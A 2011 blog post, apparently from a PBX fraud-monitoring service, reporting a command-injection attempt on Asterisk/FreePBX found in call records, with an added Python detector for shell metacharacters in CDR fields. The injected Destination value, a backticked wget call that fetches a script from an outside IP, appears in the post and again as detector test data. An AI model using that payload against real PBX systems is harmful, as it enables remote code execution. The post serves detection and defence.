Asterisk Hack Pattern

* 20 Sep – Updated information available here *

The amount of data collected by the Humbug platform is sometimes mind-boggling. With over 5000 connected PBX systems and over 4 million events on a daily basis, the amount of information stored can be overwhelming at first. As with any system that collects information at such rates, you sometimes need to step back and look at the data from a fresh point of view, and in brief moments of clarity a new pattern emerges and sheds new light on your accumulated data.
Recently, we discovered a brand new type of hack pattern that relates directly to Asterisk, specifically a way to hack your FreePBX installation and gain privileges to access it. The hack was discovered because a CDR record caused an issue with one of our collector servers. The CDR was formatted as follows:

{"api":"XXXXXXXXX","customer":"XXX",
"key":"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX",
"Event":"Cdr","Privilege":"call,all","AccountCode":"","Source":"unknown",
"Destination":"00123456789000`wget\\x20-O\\x20\/dev\/null\\x20http:\/\/91.223.89.94\/V.php`","DestinationContext":"default","CallerID":"unknown unknown","Channel":"SIP\/5060-1f92b7b8",
"DestinationChannel":"","LastApplication":"Record",
"LastData":"\/usr\/share\/arcade-project\/recordings\/arcade%d:wav",
"StartTime":"2011-09-10 20:35:17","AnswerTime":"2011-XX-XX 20:35:18",
"EndTime":"2011-XX-XX 00:35:38","Duration":"21","BillableSeconds":"20",
"Disposition":"ANSWERED","AMAFlags":"DOCUMENTATION",
"UniqueID":"1315701317.272918","UserField":"",
"gateway":"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX",
"event_time":""}

Yes, that is not your normal presentation of a CDR: it is a JSON-encoded CDR structure, in the form we analyze and store it. Putting that aside, take a look at the Destination field. Apparently, our attacker assumed that placing a call to a destination containing a back-tick operator would cause Asterisk to execute the "wget" command enclosed in the Destination. We tried obtaining the fairly suspicious V.php script (http://91.223.89.94/V.php); however, the server was no longer available. The server that supposedly hosted the V.php script is located somewhere in Vladivostok, and the IP address belongs to a Class-C network assigned to a single company, so our assumption is that it is a hacked machine somewhere on the net.

Since the discovery of this pattern, we have noticed it appearing on some other PBX systems connected to our platform, and the respective users have been notified. We are now including the pattern in our fraud analysis engine, so it will be able to alert on this issue. We are still analyzing the data that was discovered and are fairly excited about what we found. This discovery is a significant milestone for us, as we are now confident in our ability to identify new patterns at a rapid pace.
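The following is an added example of the kind of check a fraud engine can run over stored JSON CDRs to catch this pattern; it is not Humbug's code. It assumes the field names shown in the record above (Source, Destination, AccountCode, UserField, UniqueID, Channel), treats the "safe" dial-string alphabet as an assumption you may need to widen for your own numbering plan, and uses two constructed records: one modelled on the post's CDR (redacted values kept as placeholders) and one ordinary call for comparison.

```python
import json
import re

# Constructed sample records for this example. The first is modelled on the
# CDR shown in the post (redacted XXX... values and 2011-XX-XX dates kept as
# placeholders); the second is an ordinary call for comparison.
SUSPICIOUS_CDR = r'''{"api":"XXXXXXXXX","customer":"XXX",
"key":"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX",
"Event":"Cdr","Privilege":"call,all","AccountCode":"","Source":"unknown",
"Destination":"00123456789000`wget\\x20-O\\x20\/dev\/null\\x20http:\/\/91.223.89.94\/V.php`",
"DestinationContext":"default","CallerID":"unknown unknown","Channel":"SIP\/5060-1f92b7b8",
"DestinationChannel":"","LastApplication":"Record",
"LastData":"\/usr\/share\/arcade-project\/recordings\/arcade%d:wav",
"StartTime":"2011-09-10 20:35:17","AnswerTime":"2011-XX-XX 20:35:18",
"EndTime":"2011-XX-XX 00:35:38","Duration":"21","BillableSeconds":"20",
"Disposition":"ANSWERED","AMAFlags":"DOCUMENTATION",
"UniqueID":"1315701317.272918","UserField":"",
"gateway":"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","event_time":""}'''

BENIGN_CDR = r'''{"Event":"Cdr","AccountCode":"","Source":"1001",
"Destination":"+4915112345678","DestinationContext":"from-internal",
"CallerID":"\"Alice\" <1001>","Channel":"SIP\/1001-00000001",
"Disposition":"ANSWERED","UniqueID":"1315701400.1","UserField":""}'''

# Assumed alphabet of a legitimate dial string: digits, +, *, #, and the
# characters that turn up in SIP user parts. Widen it for your own plan.
SAFE_DIAL = re.compile(r'^[0-9A-Za-z+*#._\-@ ]*$')
# Shell metacharacters that have no business in a dialled number.
SHELL_META = re.compile(r'[`$;|&<>(){}\\]')
# Hex escapes of the kind used in the observed record to smuggle spaces.
HEX_ESCAPE = re.compile(r'\\x([0-9A-Fa-f]{2})')
URL = re.compile(r'https?://[^\s`\'"]+')

# Caller-controlled fields that a dialplan or AGI script might hand to a
# shell. CallerID is left out because it legitimately carries quotes and
# angle brackets and would need its own rule.
CHECKED_FIELDS = ("Source", "Destination", "AccountCode", "UserField")


def decode_hex_escapes(value):
    """Replace \\xNN escapes with the characters they encode, so the
    injected text reads the way a shell would see it."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), value)


def find_injection(cdr):
    """Return [(field, decoded_value, sorted metacharacters)] for every
    checked field whose content is not a plain dial string."""
    findings = []
    for field in CHECKED_FIELDS:
        value = cdr.get(field, "")
        if not isinstance(value, str) or SAFE_DIAL.match(value):
            continue
        decoded = decode_hex_escapes(value)
        findings.append((field, decoded, sorted(set(SHELL_META.findall(decoded)))))
    return findings


def scan_records(raw_records):
    """Parse JSON CDRs and return one alert per record with suspicious fields,
    including any URL found so it can be blocked or checked against threat intel."""
    alerts = []
    for raw in raw_records:
        cdr = json.loads(raw)
        findings = find_injection(cdr)
        if not findings:
            continue
        urls = [u for _, decoded, _ in findings for u in URL.findall(decoded)]
        alerts.append({
            "UniqueID": cdr.get("UniqueID"),
            "Channel": cdr.get("Channel"),
            "findings": findings,
            "urls": urls,
        })
    return alerts


if __name__ == "__main__":
    for alert in scan_records([SUSPICIOUS_CDR, BENIGN_CDR]):
        print(alert["UniqueID"], alert["Channel"])
        for field, decoded, meta in alert["findings"]:
            print(f"  {field}: {decoded!r}  metacharacters={meta}")
        print("  urls:", alert["urls"])
```

The check flags a record whenever a caller-controlled field contains shell metacharacters, whether or not any script on that PBX actually passes the field to a shell; the CDR alone does not show that, so a hit is a reason to review the dialplan and any AGI or System() usage that touches dialled numbers, and to block or investigate the extracted URL. The same scan can be run on live AMI Cdr events rather than stored records.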


2 Responses to “Asterisk Hack Pattern”

  1. Michael White 16. Sep, 2011 at 5:40 pm #

    Thanks for this post – We are seeing this attack as well and are hoping that more light can be shed upon it.

  2. Michael White 16. Sep, 2011 at 8:44 pm #

    P.S. Also seeing this in our Switchvox logs — Not thinking this is related specifically to FreePBX
